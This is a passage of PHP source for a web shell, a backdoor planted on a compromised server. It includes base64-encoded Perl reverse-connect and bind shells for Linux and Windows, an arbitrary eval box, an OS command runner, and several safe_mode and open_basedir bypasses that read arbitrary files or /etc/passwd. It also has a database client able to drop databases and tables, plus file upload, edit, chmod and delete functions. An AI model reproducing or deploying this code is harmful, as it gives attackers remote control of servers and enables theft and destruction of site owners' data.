IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
$opbc=fopen("bcc.pl","w");
fwrite($opbc,base64_decode($bcperl));
fclose($opbc);
system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}
function wbp($wb){
$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
$opwb=fopen("wbp.pl","w");
fwrite($opwb,base64_decode($wbp));
fclose($opwb);
echo getcwd();
system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}
function lbp($wb){
$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
$oplb=fopen("lbp.pl","w");
fwrite($oplb,base64_decode($lbp));
fclose($oplb);
system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}

if($_REQUEST['portbw']){
wbp($_REQUEST['portbw']);

}if($_REQUEST['portbl']){
lbp($_REQUEST['portbl']);
}
if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);

}

if($_REQUEST['do']=="bc"){
echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Back Connect >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;

}

if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
if(is_writable($_REQUEST['cpyto'])){

copy($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto']);
}else{echo $deny;exit;}}
if($_REQUEST['cfilename']){

echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST['cfilename'].'" name=nf4c><br><input type=submit value="  Create  "></form>'.$end;exit;
}

if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
if(is_writable($_REQUEST['address'])){

$ofile4c=fopen($_REQUEST['address'].$slash.$_REQUEST['nf4c'],"w");
fwrite($ofile4c,$_REQUEST['nf4cs']);
fclose($ofile4c);
}else{echo $deny;exit;}}

function sqlclienT(){
global $t,$errorbox,$et,$hcwd;
if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
$_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];

}

if (isset ($_GET[select_db])){
  $getdb=$_GET[select_db];
  $_SESSION[db]=$getdb;
  $query="SHOW TABLES";
  $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
}
elseif (isset ($_GET[select_tbl])){
  $tbl=$_GET[select_tbl];
  $_SESSION[tbl]=$tbl;
  $query="SELECT * FROM `$tbl`";
  $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
}
elseif (isset ($_GET[drop_db])){
  $getdb=$_GET[drop_db];
  $_SESSION[db]=$getdb;
  $query="DROP DATABASE `$getdb`";
  querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
  $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
}
elseif (isset ($_GET[drop_tbl])){
  $getbl=$_GET[drop_tbl];
  $query="DROP TABLE `$getbl`";
  querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
}
elseif (isset ($_GET[drop_row])){
  $getrow=$_GET[drop_row];
  $getclm=$_GET[clm];
  $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
  $tbl=$_SESSION[tbl];
  querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
}
else
  $res=querY($type,$server,$user,$pass,$db,$query);

if($res){
$res=htmlspecialchars($res);
$row=array ();
$title=explode('[+][+][+]',$res);
$trow=explode('[-][-][-]',$title[1]);
$row=explode('|+|+|+|+|+|',$title[0]);
$data=array();
$field=$trow[count($trow)-2];
if (strstr($trow[0],'Database')!='')
  $obj='db';
elseif (substr($trow[0],0,6)=='Tables')
  $obj='tbl';
else
  $obj='row';
$i=0;
foreach ($row as $a){
if($a!='')
$data[$i++]=explode('|-|-|-|-|-|',$a);
}

echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
foreach ($trow as $ti)
echo "<td bgcolor='F2F2F2'>$ti</td>";
echo "</tr>";
$j=0;
while ($data[$j]){
  echo "<tr>";
  foreach ($data[$j++] as $dr){
    echo "<td>";
    if($obj!='row') echo "<a href='$_SERVER[PHP_SELF]?do=db&select_$obj=$dr'>";
    echo $dr;
    if($obj!='row') echo "</a>";
    echo "</td>";
  }
  echo "<td><a href='$_SERVER[PHP_SELF]?do=db&drop_$obj=$dr";
  if($obj=='row')
    echo "&clm=$field";
  echo "'>Drop</a></td></tr>";
}
echo "</table><br>";

}



  

if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'><table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Connect to Database</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Type:</font></td><td width='250' bgcolor='#EAEAEA'><select name=typE><option valut=MySQL  onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MySQL')echo 'selected';
echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MSSQL')echo 'selected';
echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
if ($_REQUEST['typE']=='Oracle')echo 'selected';
echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='DB2')echo 'selected';
echo ">IBM DB2</option></select></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Server Address:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; 
echo "' name=serveR size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Username:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text name=useR value='";
if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root'; 
echo "' size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Password:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123'; 
echo "' name=pasS size=35></td></tr><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Submit a Query</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Name:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']); 
echo "' name=dB size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Query:</font></td><td width='250' bgcolor='#EAEAEA'><textarea name=querY rows=5 cols=27>";
if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; 
echo "</textarea></td></tr><tr><td width='400' colspan='2' bgcolor='#EAEAEA'>$hcwd<input class=buttons type=submit value='Submit' style='float: right'></td></tr></table></form>$et</center>";
}


function querY($type,$host,$user,$pass,$db='',$query){
$res='';
switch($type){
case 'MySQL':
if(!function_exists('mysql_connect'))return 0;
$link=mysql_connect($host,$user,$pass);
if($link){
if(!empty($db))mysql_select_db($db,$link);
$result=mysql_query($query,$link);
if ($result!=1){
while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<mysql_num_fields($result);$i++)
$res.=mysql_field_name($result,$i).'[-][-][-]';
}
mysql_close($link);
return $res;
}
break;
case 'MSSQL':
if(!function_exists('mssql_connect'))return 0;
$link=mssql_connect($host,$user,$pass);
if($link){
if(!empty($db))mssql_select_db($db,$link);
$result=mssql_query($query,$link);
while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<mssql_num_fields($result);$i++)
$res.=mssql_field_name($result,$i).'[-][-][-]';
mssql_close($link);
return $res;
}
break;
case 'Oracle':
if(!function_exists('ocilogon'))return 0;
$link=ocilogon($user,$pass,$db);
if($link){
$stm=ociparse($link,$query);
ociexecute($stm,OCI_DEFAULT);
while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<oci_num_fields($stm);$i++)
$res.=oci_field_name($stm,$i).'[-][-][-]';
return $res;
}
break;
case 'PostgreSQL':
if(!function_exists('pg_connect'))return 0;
$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
if($link){
$result=pg_query($link,$query);
while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<pg_num_fields($result);$i++)
$res.=pg_field_name($result,$i).'[-][-][-]';
pg_close($link);
return $res;
}
break;
case 'DB2':
if(!function_exists('db2_connect'))return 0;
$link=db2_connect($db,$user,$pass);
if($link){
$result=db2_exec($link,$query);
while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<db2_num_fields($result);$i++)
$res.=db2_field_name($result,$i).'[-][-][-]';
db2_close($link);
return $res;
}
break;
}
return 0;
}
function bywsym($file){
if(!function_exists('symlink')){echo "Function Symlink Not Exist";}

if(!is_writable("."))
  die("not writable directory");
$level=0;
for($as=0;$as<$fakedep;$as++){
  if(!file_exists($fakedir))
    mkdir($fakedir);
  chdir($fakedir);
}
while(1<$as--) chdir("..");
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
  if(!empty($hardstyle[$a])){
    if(!file_exists($hardstyle[$a])) 
      mkdir($hardstyle[$a]);
    chdir($hardstyle[$a]);
    $as++;
}}
$as++;
while($as--)
  chdir("..");
@rmdir("fakesymlink");
@unlink("fakesymlink");
@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
while(1)
  if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
  else $num++;
@unlink("fakesymlink");
mkdir("fakesymlink");
}
function bypcu($file){
$level=0;

if(!file_exists("file:"))
  mkdir("file:");
chdir("file:");
$level++;

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
  if(!empty($hardstyle[$a])){
    if(!file_exists($hardstyle[$a])) 
      mkdir($hardstyle[$a]);
    chdir($hardstyle[$a]);
    $level++;
  }
}

while($level--) chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);

echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';

if(FALSE==curl_exec($ch))
  die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');

echo ' </textarea> </FONT>';

curl_close($ch);
}
if ($_REQUEST['bypcu']){
bypcu($_REQUEST['bypcu']);
}
if($_REQUEST['do']=="bypasscmd"){
if($_POST['bycw']){
echo $_POST['bycw'];
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
            $stdout = $exec->StdOut();
            $stcom = $stdout->ReadAll();}
      
echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr><center>Bypass Safe_Mode And Disable_Functions In Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'<input type=hidden value="bypasscmd" name=do>Command </font></td><td width="750"><input name=bycw size=50><input type=submit value ="eXecute"></form></td></tr></table>Bypass Safe_Mode Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Command </font></td><td width="750"><input name=byws size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypasscmd"></form></td></tr></table>'.$end;exit;;
}
if($_REQUEST['do']=="bypassdir"){
if($_POST['byoc']){
if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
}else{$bopens="Can Not Bypass This";}
}
if($_POST['byfc']){
curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
$debfc=curl_exec($ch);
}
if($_POST['byetc']){
for($bye=0;$bye<40000;$bye++){   //cat /etc/passwd
$sbep =$sbep. posix_getpwuid($bye);
}}
if($_POST['byfc9']){
echo "not sucsfull";
}
if($_REQUEST['bysyml']){
$file=$_REQUEST['bysyml'];
bywsym($file);
}
echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){var_dump($debfc);} echo $bopens.'</textarea><hr><center>Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right">'.$formp.'<input type=hidden value="bypassdir" name=do><font face="Tahoma" style="font-size: 10pt; font-weight:700">Address File </font></td><td width="750"><input name=byoc size=50 ><input type=submit value ="read"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc9 size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass /Etc/Passwd<br>'.$formp.'<input type=submit value ="Read Passwd"><input type=hidden name=byetc value="lol"><input type=hidden name=do value="bypassdir"></form><hr>Bypass With ini_restore'.$formp.'<input type=submit value ="Read File"><input name=rfili value="Pejijon" type=hidden><input type=hidden name=do value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bysyml size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"><input name=rfili value="Pejijon" type=hidden></form></td></tr></table><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bypcu size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"></form></td></tr></table>'.$end;exit;;




}
if($_POST['nameren'] && $_POST['addressren']){
if(is_writable($_REQUEST['addressren'])){

rename($_POST['addressren'],$_POST['nameren']);}else{echo $deny;exit;}
}
if($_GET['do']=="delete"){

if ($_GET['type']=="dir"){
if(is_writable($_REQUEST['address'])){
$dir=$_GET['address'].$_GET['filename'];
deleteDirectory($dir);
}elseif($_GET['type']=="file"){
if(is_writable($_GET['address'].$_GET['filename'])){

unlink($_GET['address'].$_GET['filename']);}else{echo $deny;exit;}
}
}}
if($_POST['fedit'] && $_POST['namefe']){
if(is_writable($_REQUEST['address'])){

$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
echo bazam;
fwrite($opensave,$_POST['fedit']);
fclose($opensave);}else{echo $deny;exit;}
}
if ($_POST['evalsource']){

eval($_POST['evalsource']);
}
if($_GET['do']=="eval"){
echo $head.$formp.$nowaddress.'<p align="center"><textarea rows="19" name="evalsource" cols="87"></textarea><br><input type=submit value="  eXecute  "></form></p>'.$end;exit;
}
if($_GET['do']=="info"){
if(ini_get('safe_mode')){
$safe_modes="On";
}else{
$safe_modes="Off";
}
if(ini_get('disable_functions')){
$disablef=ini_get('disable_functions');
}else{
$disablef="All Functions Enable";
}
if(ini_get('register_globals')){
$registerg="Enable";
}else{
$registerg="disable";
}
if(extension_loaded('curl')){
$curls="Enable";
}else{
$curls="disable";
}
if(@function_exists('mysql_connect')){
$db_on = "Mysql : On";
};
if(@function_exists('mssql_connect')){
$db_on = "Mssql : On";
};
if(@function_exists('pg_connect')){
$db_on = "PostgreSQL : On";
};if(@function_exists('ocilogon')){
$db_on = "Oracle : On";
};

echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Disable_Functions : ".$disablef."<br>Safe_Mode : ".$safe_modes."<br>Openbase_dir : ".ini_get('openbase_dir')."<br>Php Version : ".phpversion()."<br>Free Space : ".sizee(disk_free_space("/"))."<br>Total Space : ".sizee(disk_total_space("/"))."<br>Register_Globals : ".$registerg."<br>Curl : ".$curls."<br>Database ".$db_on."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
exit;
}
if ($_GET['do']=="cmd"){
echo $head.'
<form method=get action="'.$me.'">
<p align="center">
<textarea rows="19" name="S1" cols="87">';if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
echo $_GET['execmethod']($_GET['command']);}
if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
popen($_GET['command'],"r");}

echo'</textarea></p><p align="center">
<input type=hidden name="do" size="50" value="cmd"> <input type="text" name="command" size="50"><select name=execmethod>
  <option value="system">System</option>  <option value="exec">Exec</option>  <option value="passthru">Passthru</option><option value="popen">popen</option>
</select><input type="submit" value="eXecute">
</p></form>'.$end;exit;}
if($_GET['do']=="db"){
echo $head;sqlclienT();echo $end;
exit;
}
if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
$chmodnum2=$_REQUEST['chmodnow'];
chmod($_REQUEST['file2ch'],"0".$chmodnum2);
}
if($_GET['do']=="chmod"){
echo $head.$formg.$nowaddress."<p align=center><b>Chmod</b><br><input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'> To  <input name=chmodnow size=1 value=777><br><input type=submit value=Set></form>".$end;exit;

}
if($_GET['do']=="edit"){
if($_GET['filename']=="dir"){
if(is_readable($_GET['address'].$_GET['filew'])){
chdir($_GET['address'].$_GET['filew']);}else{echo $deny;exit;}

}}
$araddresss=explode($slash,getcwd());
$matharrayy=count($araddresss)-1;
$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
for($countback=0;$countback<count($addr1backk);$countback++){
$arraybacke[$countback]=$slash.$addr1backk[$countback];
$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
}
if ($slash=="\\"){
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
}else{
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."/".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
var_dump($backaddresss);
$backaddresss=str_replace("\\","/",$backaddresss);
}
function calc_dir_size($path)
{
$size = 0;
if ($handle = opendir($path))
{
while (false !== ($entry = readdir($handle)))
{
$current_path = $path . '/' . $entry;
if ($entry != '.' && $entry != '..' && !is_link($current_path))
{
if (is_file($current_path))
$size += filesize($current_path);
elseif (is_dir($current_path))
$size = calc_dir_size($current_path);
}
}
}
closedir($handle);
return $size;
} 
if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
if($cwd==''){$cwd=getcwd();}$nowaddress='<input type=hidden name=address value="'.$cwd.'">';
$ad=getcwd();
$hand=opendir("$ad");
while (false !== ($fileee = readdir($hand))) {
        if ($fileee != "." && $fileee != "..") {
    if (filetype($fileee)=="dir"){
$fil=$fil.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename=dir&filew='.$fileee.'">'.$fileee.'</span></td>
<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=chmod&address='.$cwd.$slash.'&filename='.$fileee.'">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
;}
else{
$file=$file.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">'.$fileee.'</span></td>
<td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.sizee(filesize($fileee)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=chmod&address='.$cwd.$slash.'&filename='.$fileee.'">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">Edit</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
;}
}
}
echo $head.'
<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.$backaddresss.'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
</tr></table>'.$fil.$file.'</table>
<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formg.'Change Directory</font></td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee > 
<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
